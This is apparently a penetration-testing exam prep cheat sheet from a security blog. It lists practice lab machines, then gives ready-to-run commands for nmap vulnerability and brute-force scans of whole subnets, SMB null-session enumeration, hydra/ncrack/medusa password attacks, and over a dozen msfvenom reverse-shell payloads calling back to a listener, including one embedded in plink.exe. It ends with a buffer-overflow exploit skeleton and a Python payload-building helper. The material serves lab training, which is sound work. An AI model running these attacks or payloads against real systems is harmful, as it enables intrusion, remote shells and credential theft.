Dragon
admin  2019-04-15 15:13  Source: lsh4ck's Blog

Preparation:

HTB machines:

  • Bastard 10.10.10.9
  • Cronos 10.10.10.13
  • Grandpa 10.10.10.14
  • October 10.10.10.16
  • Calamity 10.10.10.27
  • Solidstate 10.10.10.51
  • Enterprise 10.10.10.61
  • Sense 10.10.10.60
  • Bart (Again, same issue but really get used to windows) 10.10.10.81
  • Frolic 10.10.10.111

Vulnhub machines:

  • Kioptrix: Level 1 (#1)
  • Kioptrix: Level 1.1 (#2)
  • Kioptrix: Level 1.2 (#3)
  • Kioptrix: Level 1.3 (#4)
  • FristiLeaks: 1.3
  • Stapler: 1
  • PwnLab: init
  • Kioptrix: 2014
  • Brainpan: 1
  • Mr-Robot: 1
  • HackLAB: Vulnix
  • VulnOS: 2
  • SickOs: 1.2
  • /dev/random: scream
  • pWnOS: 2.0
  • SkyTower: 1
  • IMF

Some useful commands:

Port knock (one SYN per port, in order; --host-timeout is the canonical spelling of --host_timeout, and --max-retries 0 keeps it to a single probe per port):
for x in 7000 8000 9000; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x 10.10.10.10; done
Plain nmap:
nmap -sS -Pn --open x.x.x.x
nmap -sC -sS -A -O x.x.x.x
My go-to nmap commands (-A already implies -sC, -sV and -O; --script=vuln is noisy; -sF is a FIN scan, which only reports open|filtered and does not work against Windows targets):
nmap -sS --osscan-guess -A -vv --script=vuln x.x.x.x
nmap -sF -A --version-all -sC --osscan-guess -F -n -sV x.x.x.x
One-liner nmap scan of the target's /24 for common vulnerabilities:
nmap -sT -Pn -v --script dns-zone-transfer.nse,ftp-anon.nse,ftp-proftpd-backdoor.nse,ftp-vsftpd-backdoor.nse,ftp-vuln-cve2010-4221.nse,http-backup-finder.nse,http-cisco-anyconnect.nse,http-iis-short-name-brute.nse,http-put.nse,http-php-version.nse,http-shellshock.nse,http-robots.txt.nse,http-svn-enum.nse,http-webdav-scan.nse,iax2-version.nse,memcached-info.nse,mongodb-info.nse,msrpc-enum.nse,ms-sql-info.nse,mysql-info.nse,nrpe-enum.nse,pptp-version.nse,redis-info.nse,rpcinfo.nse,samba-vuln-cve-2012-1182.nse,smb-vuln-ms08-067.nse,smb-vuln-ms17-010.nse,snmp-info.nse,sshv1.nse,xmpp-info.nse,tftp-enum.nse,teamspeak2-version.nse x.x.x.0/24
One-liner nmap weak-password brute force across the target's /24:
nmap -sT -v -Pn --script ftp-brute.nse,imap-brute.nse,smtp-brute.nse,pop3-brute.nse,mongodb-brute.nse,redis-brute.nse,ms-sql-brute.nse,rlogin-brute.nse,rsync-brute.nse,mysql-brute.nse,pgsql-brute.nse,oracle-sid-brute.nse,oracle-brute.nse,rtsp-url-brute.nse,snmp-brute.nse,svn-brute.nse,telnet-brute.nse,vnc-brute.nse,xmpp-brute.nse x.x.x.0/24
nmap SMB vulnerability scan:
nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse x.x.x.x
SMB user and share enumeration (works over a null session on older or misconfigured hosts):
nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse x.x.x.x
nmap LDAP anonymous-bind search:
nmap -p389 --script ldap-search x.x.x.x
gobuster full scan (gobuster 2.x syntax as written; gobuster 3.x takes the same flags after the dir subcommand):
gobuster -s 200,204,301,302,307,403 -u http://x.x.x.x -w /usr/share/wordlists/xxxx.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
gobuster regular scan (also tries each word with the listed extensions):
gobuster -u http://x.x.x.x -w /usr/share/wordlists/xxxx.txt -t 50 -x php,txt,zip,tar
rpcclient null session (-N skips the password prompt):
rpcclient -U "" -N x.x.x.x
SMB connect (list the shares first, then open one; -N for a null session):
smbclient -L //x.x.x.x -N
smbclient //x.x.x.x/share -N
rdesktop:
rdesktop -u username -p password -g 85% -r disk:share=/root/ x.x.x.x
python ftp-server:

Linux proof screenshot:
hostname && whoami && cat proof.txt && /sbin/ifconfig
Windows proof screenshot:
hostname && whoami.exe && type proof.txt && ipconfig /all
sshuttle (GitHub):
sshuttle -vvr user@10.10.10.10 10.1.1.0/24
Local port forwarding (a port on your box reaches <remote host>:<remote port> through the gateway):
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
Remote port forwarding (a port on the gateway reaches a host you can see):
ssh <gateway> -R <remote port to bind>:<local host>:<local port>
Dynamic port forwarding (SOCKS proxy on the local port, use it with proxychains):
ssh -D <local proxy port> -p <remote port> <target>
plink port forwarding (run on the Windows host; exposes its RDP as port 3389 on <remote host>, <localhost> being 127.0.0.1 on the Windows side):
plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>

John / brute-force related:

RDP brute force:
ncrack -vv --user offsec -P passwords rdp://x.x.x.x
SSH brute force (-t is the task count, not the target; hydra itself recommends 4 for ssh):
hydra -l user -P pass.txt -t 4 x.x.x.x ssh -s 22
FTP brute force:
medusa -h x.x.x.x -u user -P passwords.txt -M ftp

Generating payloads with msfvenom:

PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php

Java WAR reverse shell
msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war

Linux bind shell
msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai

FreeBSD x64 reverse shell (ELF)
msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f elf -o shell.elf

Linux C reverse shell
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f c

Windows non staged reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe

Windows Staged (Meterpreter) reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe

Windows Python reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f python -o shell.py

Windows ASP reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f asp -e x86/shikata_ga_nai -o shell.asp

Windows ASPX reverse shell
msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx

Windows JavaScript reverse shell with nops
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f js_le -e generic/none -n 18

Windows Powershell reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1

Windows reverse shell excluding bad characters
msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f c -b "\x00\x04" -e x86/shikata_ga_nai

Windows x64 bit reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -o shell.exe

Windows reverse shell embedded into plink
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe

Some buffer-overflow (BOF) commands:

Exploit skeleton (offset bytes of junk up to the saved return address, the address that overwrites it in little-endian form, a 16-byte NOP sled, the shellcode, then padding so the total length stays constant):
payload = "\x41" * <offset> + <ret> + "\x90" * 16 + <shellcode> + "\x43" * <padding>

Pattern create
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <length>

Pattern offset (pass the value EIP held at the crash)
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l <length> -q xxxxxxx

nasm shell (assemble an instruction to get its opcode bytes, e.g. to search a module for a JMP gadget):
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > jmp eax

Bad characters (\x00 is already left out since it almost always terminates the copy; send this string, find it in memory after the crash, remove any byte that is altered or truncates what follows, then resend until the whole string arrives intact):
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

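The pattern_create / pattern_offset workflow, the bad-character check and the payload layout from the skeleton above, as an added example in Python. This is not code from the original page or from Metasploit; the helper names, the crash value 0x41306241, the return address 0x5f4a358f and the simulated "observed" memory contents are all constructed for the example.

```python
# Added example: pure-Python equivalents of pattern_create.rb / pattern_offset.rb,
# the bad-character comparison and the payload layout from the skeleton above.
# Not from the original page or from Metasploit. Helper names and all sample
# values (crash value, return address, "observed" bytes) are constructed.
import itertools
import string
import struct

# Aa0Aa1...Zz9 is unique for 26 * 26 * 10 three-byte chunks = 20280 bytes,
# the length at which pattern_create.rb starts repeating itself.
MAX_UNIQUE = 26 * 26 * 10 * 3


def pattern_create(length: int) -> bytes:
    """Same sequence as Metasploit's pattern_create.rb -l <length>."""
    if not 0 < length <= MAX_UNIQUE:
        raise ValueError("length must be between 1 and %d" % MAX_UNIQUE)
    chunks = []
    for u, l, d in itertools.product(string.ascii_uppercase,
                                     string.ascii_lowercase, string.digits):
        chunks.append(u + l + d)
        if len(chunks) * 3 >= length:
            break
    return "".join(chunks)[:length].encode()


def pattern_offset(value, length: int = MAX_UNIQUE) -> int:
    """Offset of a crash value inside the pattern (-1 if absent).

    value may be the register contents as the debugger shows them (an int or
    a '0x...' string, searched as a little-endian DWORD/QWORD) or the raw
    bytes read from the stack."""
    if isinstance(value, str) and value.lower().startswith("0x"):
        value = int(value, 16)
    if isinstance(value, int):
        needle = struct.pack("<Q" if value > 0xFFFFFFFF else "<I", value)
    elif isinstance(value, str):
        needle = value.encode()
    else:
        needle = bytes(value)
    return pattern_create(length).find(needle)


# Every byte except \x00, which nearly always terminates the copy.
ALL_CHARS = bytes(range(1, 256))


def first_bad_char(sent: bytes, observed: bytes):
    """Compare the bad-char string that was sent with the bytes found in
    memory after the crash. Returns the first byte that was altered or cut
    off, or None when everything arrived intact. One bad byte usually
    mangles or truncates everything after it, so drop it from the string
    and send again until this returns None."""
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return b
    return None


def build_payload(offset: int, ret: int, shellcode: bytes, total_len: int,
                  badchars: bytes = b"\x00", nops: int = 16) -> bytes:
    """offset bytes of 'A', the return address little-endian, a NOP sled, the
    shellcode, then 'C' padding so the total length stays constant. Refuses
    to build a payload whose return address or shellcode contains a bad char."""
    ret_bytes = struct.pack("<I", ret)
    for name, blob in (("return address", ret_bytes), ("shellcode", shellcode)):
        hits = [hex(b) for b in badchars if b in blob]
        if hits:
            raise ValueError("%s contains bad chars: %s" % (name, ", ".join(hits)))
    body = b"\x41" * offset + ret_bytes + b"\x90" * nops + shellcode
    if len(body) > total_len:
        raise ValueError("payload is %d bytes, longer than total_len" % len(body))
    return body + b"\x43" * (total_len - len(body))


if __name__ == "__main__":
    # Constructed walk-through: EIP read 0x41306241 after a 100-byte pattern
    # was sent, so the saved return address sits 30 bytes into the buffer.
    print(pattern_create(100))
    print(pattern_offset("0x41306241", 100))
    # Simulated memory dump in which \x0a terminated the copy after 9 bytes.
    print(hex(first_bad_char(ALL_CHARS, ALL_CHARS[:9])))
    print(build_payload(30, 0x5F4A358F, b"\xcc" * 4, 60, badchars=b"\x00\x0a"))
```

The offset search converts the debugger's register value back into the byte order it had in memory, which is the step most often done by hand wrongly; the bad-character check is written to be repeated, because after the first bad byte the rest of the dump is no longer meaningful.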
Exam

Report

Suggested report structure:

This is an original article and the copyright belongs to the author. Feel free to share it, but keep the source when reposting!

admin, last edited 2019-04-16

lsh4ck's Blog - Hacking is endless! Focus on network security!
